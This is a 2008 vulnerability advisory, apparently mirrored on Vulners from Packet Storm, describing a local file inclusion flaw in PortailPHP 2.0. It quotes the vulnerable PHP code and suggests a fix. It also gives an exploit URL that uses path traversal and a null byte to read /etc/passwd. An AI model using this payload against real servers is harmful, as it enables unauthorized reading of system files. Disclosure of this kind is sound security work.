Lucene search
K

Portail PHP 2.0 Local File Inclusion

🗓️ 16 Dec 2008 00:00:00Reported by OsirysType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

Portail 2.0 Local File Inclusion Vulnerabilit

Code
`[START]  
  
#########################################################################################  
[0x01] Informations:  
  
Script : Portailphp 2.0  
Download : http://www.safari-msi.com/portailphp/mod_file/upload/PortailPHP-v2.0.zip  
Vulnerability : Local File Inclusion  
Author : Osirys  
Contact : osirys[at]live[dot]it  
Website : http://osirys.org  
Notes : Proud to be Italian  
Greets: : XaDoS, x0r, emgent, Jay, str0ke. Expecially to: AlpHaNiX  
  
#########################################################################################  
[0x02] Bug:[Local File Inclusion]  
######  
  
Bugged file is: /[path]/i-accueil.php  
  
[CODE]  
  
<?php  
/*  
PORTAILPHP  
*/  
echo "<table width='100%'><tr><td>";  
echo "<img border='0' src='themes/" . $_SESSION["App_Theme"] . "/ico-fleche01.gif' alt=''>  
&nbsp;Bienvenue sur <strong>$App_Me_Titre</strong><br /><br />" ;  
include("$chemin/mod_news/index.php");  
echo "</td></tr></table>";  
  
?>  
  
[/CODE]  
  
$chemin is not declared, so we can set its value from GET.  
  
[!] FIX: Just declare $chemin, or don't include it, becouse it's not necessary.   
i-accueil.php is in the / path, like /mod_news/index.php.  
Secure include: include("/mod_news/index.php");  
  
[!] EXPLOIT: /[path]/i-accueil.php?chemin=[local_file_to_include]  
../../../../../../../../../../../etc/passwd%00  
  
#########################################################################################  
  
[/END]`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation